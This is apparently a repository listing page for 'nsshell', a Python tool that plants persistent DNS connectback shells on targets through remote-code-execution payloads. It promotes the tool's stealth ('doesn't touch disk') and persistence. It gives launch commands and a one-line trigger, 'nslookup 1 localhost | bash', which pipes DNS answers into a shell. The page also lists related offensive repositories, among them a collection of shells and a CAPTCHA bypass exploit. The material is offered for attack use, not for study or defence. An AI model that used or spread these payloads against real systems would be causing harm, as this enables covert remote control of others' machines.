TheRook/nsshell TheRook/nsshell

  • Stars
    star
    102
  • Rank 333,646 (Top 7 %)
  • Language
    Python
  • License
    GNU General Publi...
  • Created over 7 years ago
  • Updated about 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
TheRook/nsshell
github

TheRook

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A DNS connectback shell executed by strings in payloads.txt

Think sqlmap meets xsshunter - but looking for (blind/nonblind) RCE to get a DNS connectback shell.

  • persistent shell (even if you exit nsshell.py)
  • doesn't touch disk
  • resumes access when you restart nsshell.py
  • nothing to install or compile for the target
  • the target can use their own trusted DNS resolver - or automatically upgrade to a direct connection for speed

Start: The tool needs to know which domain it has control over:

sudo ./nsshell.py host.com 123.123.123.112

wrote connectback payloads to:payloads.txt

The file above contains a list of auto-pwns. Run one of the payloads and a persistent shell will be loaded over DNS.

install

sudo make install

Run Server - localhost for testing

sudo python nsshell.py localhost 127.0.0.1

Spawn Connectback shell - localhost for testing

nslookup 1 localhost | bash

That's all folks!

More Repositories

1

subbrute

A DNS meta-query spider that enumerates DNS records, and subdomains.
Python
3,170
star
2

CSRF-Request-Builder

JavaScript
75
star
3

KeypoolRandom

A cryptographically secure lockless PRNG device driver using AES
C
12
star
4

-hell

A collection of shells
ColdFusion
5
star
5

MultiplexedPlasmidBuilder

To combine and modify genbank files to construct multiplexed CRISPR plasmids.
Python
3
star
6

SecretStore

A place to store secrets.
C
2
star
7

AudioCaptchaBypass-CVE-2008-2019

PHP
2
star
8

sneakernet

Chimeric File Polygots for Artistic Expression
JavaScript
2
star